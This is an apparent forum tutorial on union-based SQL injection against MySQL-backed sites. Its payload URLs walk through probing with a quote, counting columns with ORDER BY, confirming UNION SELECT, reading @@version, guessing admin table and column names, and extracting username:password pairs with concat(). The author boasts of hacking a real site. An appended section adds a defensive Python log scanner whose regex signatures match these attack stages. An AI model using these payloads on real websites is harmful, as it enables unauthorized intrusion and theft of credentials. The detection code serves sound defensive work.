The world's most popular open source database MySQL.
I’ll make it easy and fast, simple and with less theory.
What you will read about:
*Check For Vuln.
*Check How Many Columns Are There
*Check Whether Union Works
*Check For Version
*Getting table and column name & Pulling Data Out.
Okay, letz start…
We are going to use an example like this:
Code:
http://site.com/news.php?id=5
*Check For Vuln.
Checking for the vuln is the same as in normal SQL injection, with a single quote ('), so the URL will look like this:
Code:
http://site.com/news.php?id=5'
and we will get something like
Code:
"You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
This means that the site is vuln to MySQL injection.
*Check How Many Columns Are There
Like I said, as in normal MySQL injection, we do this with
So we now go to the URL and try to find how many columns there are:
Code:
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error
We got some message like
Code:
Unknown Column "4" in "order clause"
This means that there are 3 columns
*Check Whether Union Works
With UNION we can select more data in one SQL statement.
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.
*Check For Version
So when we typed this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
some numbers, let's say 2, showed up on the screen. Now we change 2 into
Code:
version() or @@version
so the URL will look like this:
Code:
http://www.site.com/news.php?id=5 union select 1,@@version,3/*
and we get a result something like this:
Code:
4.1.33-log or 5.0.45 or similar.
*Getting table and column name
And now is the real part where you learn about how to do this shit.
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12…) we need to guess the table names and column names. So this is the hard part in this injection.
-Why?
Well, not every site is in the English language. I recently hacked a site from Belgium; the columns and tables weren’t like
Code:
username,user,userid,password,members,admin etc
They were completely different, so this makes the injector (you/hacker) work a lot harder: you need to search for those kinds of words, then translate them. It's lotz and lotz of work, and maybe everything will be for nothing. That is why I hate this injection. So letz say the site has English table names and column names.
common table names:
Code:
user,users,admin,administrators,members,member,login
common column names:
Code:
username,useremail,n_user,user_name,user,password,pass,upass,userpassword,userpass,hash,email,umail
Now letz check if there is a table named admin. We do that like this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
So if we see the number 2 on the screen, the table admin exists. If it doesn't exist, we will probably get an error.
So we move on. We know there is a table named admin; now it's time for the columns:
Code:
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
If we get an error, the column name “username” doesn’t exist,
so we try another:
Code:
http://www.site.com/news.php?id=5 union all select 1,uname,3 from admin/*
It returns data, e.g.:
So we guessed the user column; now it's time for the password:
Code:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
Damn, it returns an error: there is no column named “password”. Let's try another:
Code:
http://www.site.com/news.php?id=5 union all select 1,upass,3 from admin/*
w00t we got:
So now we know that there is a table named:
with columns:
and we pulled the data from them and got:
Code:
Administrator:AdminPassword
Also we can use concat() to get everything in one request:
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(uname,0x3a,upass),3 from admin/*
and we get:
Administrator:AdminPassword
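From the defender's side, each step above leaves a recognisable request in the web server's access log. The following is an added example, not code from the original post: it tags decoded query-string values with the step they resemble and reports clients that hit at least two steps. The log format, the sample lines, the addresses and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# One signature per step of the walkthrough above, applied to decoded parameter values.
STAGES = [
    ("quote_probe", re.compile(r"^\d+\s*'")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(", re.I)),
]
# Assumption: Apache/nginx "combined"-style lines; client address is the first field.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the names of the stages whose signature matches a decoded value."""
    return [name for name, rx in STAGES if rx.search(value)]

def scan(lines, min_stages=2):
    """Map client -> sorted stage names, for clients that hit >= min_stages stages."""
    seen = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes, so %20, + and %27 are normalised before matching.
        for _key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            seen[client].update(classify(value))
    return {c: sorted(s) for c, s in seen.items() if len(s) >= min_stages}

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=5%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 200 298',
    '198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /news.php?id=5+union+all+select+1,@@version,3/* HTTP/1.1" 200 340',
    '203.0.113.20 - - [01/Jan/2024:10:01:00 +0000] "GET /news.php?id=5 HTTP/1.1" 200 2048',
    '203.0.113.20 - - [01/Jan/2024:10:01:30 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE).items():
        print(client, stages)
```

Requiring two distinct steps from one client keeps a stray apostrophe in a search term from raising an alert, while the probe, column count and UNION sequence still stands out.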